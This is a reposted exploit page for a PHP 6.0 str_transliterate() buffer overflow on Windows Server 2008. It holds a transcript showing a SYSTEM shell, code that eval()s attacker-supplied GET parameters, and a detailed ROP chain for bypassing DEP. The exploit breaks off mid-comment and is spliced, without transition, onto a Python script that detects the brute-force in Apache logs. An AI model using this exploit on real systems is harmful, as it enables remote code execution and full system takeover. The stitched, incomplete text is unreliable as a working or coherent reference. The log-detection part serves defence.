PHP 6.0 Dev str_transliterate() Buffer Overflow

Source: Internet
Author: User

Test method:

The program (method) provided on this site may be offensive and is only to be used for security research and teaching. You use it at your own risk!

<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin (AT) offsec.com
Original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
 
Thx to muts and Elwood for helping ;)
 
Bruteforce script is attached in base64 format.
 
root@bt:~# ./Brute_php6.py 172.16.30.249/pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof | ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
 
C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
 
error_reporting(0);

// High and low halves of the WriteProcessMemory address come in as decimal GET parameters
$base_s = $_GET['pos_s'];
$base_e = $_GET['pos_e'];
$off_s  = $_GET['off_s'];
$off_e  = $_GET['off_e'];

if (ini_get_bool('unicode.semantics')) {
    $buff = str_repeat("\u4141", 32);
    $tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM
    $ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
    $ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM
    $wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uffff\uffff\uffff".$ptw; // WPM ARGS
    // Build the PHP statement '$wpm = "\u<off_s><off_e>\u<base_s><base_e>";' from the GET values
    // (low word first, high word second) and eval it to get the candidate WPM address as a string
    $garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
               "\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";";
    eval($garbage);
    $nops = str_repeat("\u9090", 41);

    // TH | ROP -> Try Harder or Rest On Pain ;)
    // GETTING SHELLCODE ABSOLUTE ADDRESS
    $rop  = "\u40dd\u6FF2";   // mov eax,ebp / pop esi / pop ebp / pop ebx / retn  (6FF240DD)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u5DD4\u6EE6";   // pop ecx / retn  (6EE65DD4)
    $rop .= "\uFDBC\uFFFF";   // value to be popped in ecx (rel. offset to shellcode) FFFFFDBC
    $rop .= "\u222B\u6EED";   // add eax,ecx / pop ebx / pop ebp / retn  (6EED222B)
    $rop .= "\u2650\u6EE5";   // junk popped in ebp (ret to shellcode)
    $rop .= "\u2650\u6EE5";   // junk popped in ebp (ret to shellcode)

    // PATCHING BUFFER ADDY ARG FOR WPM
    $rop .= "\u1C13\u6EE6";   // add dword ptr ds:[eax],eax / retn  (6EE61C13)

    // Getting num bytes in register 0x1A0 (len of shellcode)
    $rop .= "\uE94E\u6EE6";   // mov edx,ecx / pop ebp / retn  (6EE6E94E)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u5DD4\u6EE6";   // pop ecx / retn  (6EE65DD4)
    $rop .= "\uFF5C\uFFFF";   // value to be popped in ecx FFFFFF5C
    $rop .= "\uE94C\u6EE6";   // sub ecx,edx / mov edx,ecx / pop ebp / retn  (6EE6E94C)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP

    // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
    $rop .= "\u0C54\u6EE7";   // mov dword ptr ds:[eax+4],ecx / pop ebp / retn  (6EE70C54)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP

    // REALIGNING ESP TO WPM AND RETURNING TO IT
    $rop .= "\u8640\u6EE6";   // add eax,-30 / pop ebp / retn  (6EE68640)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u29F1\u6EE6";   // add eax,0C / pop ebp / retn  (6EE629F1)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u29F1\u6EE6";   // add eax,0C / pop ebp / retn  (6EE629F1)
    $rop .= "\u00002\u00002"; // JUNK POPPED IN EBP
    $rop .= "\u10AD\u6FC3";   // inc eax / retn  (6FC310AD)
    $rop .= "\u10AD\u6FC3";   // inc eax / retn  (6FC310AD)
    $rop .= "\u10AD\u6FC3";   // inc eax / retn  (6FC310AD)
    $rop .= "\u10AD\u6FC3";   // inc eax / retn  (6FC310AD)
    $rop .= "\u10AD\u6FC3";   // inc eax / retn  (6FC310AD)
    $rop .= "\u10AD\u6FC3";   // INC E
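The brute-force transcript above shows the script being called repeatedly with pos_s/pos_e stepping through candidate high halves of the WriteProcessMemory address, which is what a defender would look for in the web server log. The following Python is an added detection example, not part of the exploit or the brute-force script: it parses Apache access-log lines (constructed below, with an assumed path /pwnPhp6.php and illustrative off_* values), rebuilds the 32-bit address each request asked for, and flags any client that cycled through several of them.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines modelling the four attempts in the
# transcript (client IP, path and off_* values are illustrative).
SAMPLE_LOG = """\
172.16.30.1 - - [06/Apr/2010:11:02:01 +0200] "GET /pwnPhp6.php?pos_s=120&pos_e=0&off_s=69&off_e=98 HTTP/1.1" 500 0 "-" "Python-urllib/2.6"
172.16.30.1 - - [06/Apr/2010:11:02:03 +0200] "GET /pwnPhp6.php?pos_s=119&pos_e=0&off_s=69&off_e=98 HTTP/1.1" 500 0 "-" "Python-urllib/2.6"
172.16.30.1 - - [06/Apr/2010:11:02:05 +0200] "GET /pwnPhp6.php?pos_s=118&pos_e=0&off_s=69&off_e=98 HTTP/1.1" 500 0 "-" "Python-urllib/2.6"
172.16.30.1 - - [06/Apr/2010:11:02:07 +0200] "GET /pwnPhp6.php?pos_s=117&pos_e=0&off_s=69&off_e=98 HTTP/1.1" 200 0 "-" "Python-urllib/2.6"
10.0.0.5 - - [06/Apr/2010:11:03:00 +0200] "GET /index.php?pos_s=abc&pos_e=0&off_s=1&off_e=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')
ADDR_PARAMS = ("pos_s", "pos_e", "off_s", "off_e")

def attempted_address(pos_s, pos_e, off_s, off_e):
    """Rebuild the 32-bit address the exploit splices into its chain: the script
    emits the low word (off_s off_e) first and the high word (pos_s pos_e) second."""
    return (pos_s << 24) | (pos_e << 16) | (off_s << 8) | off_e

def parse_request(line):
    """Return (client, path, address) for a request carrying all four address
    parameters as integers; None for any other line (including non-numeric values)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    qs = {k: v[0] for k, v in parse_qs(url.query).items()}
    if not all(p in qs for p in ADDR_PARAMS):
        return None
    try:
        values = [int(qs[p]) & 0xFF for p in ADDR_PARAMS]  # script uses dechex + %02s, one byte each
    except ValueError:
        return None
    return m.group("client"), url.path, attempted_address(*values)

def find_wpm_bruteforce(log_text, min_attempts=3):
    """Map (client, path) -> sorted distinct addresses tried, keeping only clients
    that tried at least min_attempts different addresses against the same script."""
    tried = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_request(line)
        if rec is not None:
            client, path, addr = rec
            tried[(client, path)].add(addr)
    return {k: sorted(v) for k, v in tried.items() if len(v) >= min_attempts}
```

Run `find_wpm_bruteforce(SAMPLE_LOG)` to get the one flagged client with the four base addresses 0x75.. to 0x78.. from the transcript; the HTTP status is deliberately ignored, since the failed attempts crash the worker and the successful one returns normally.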
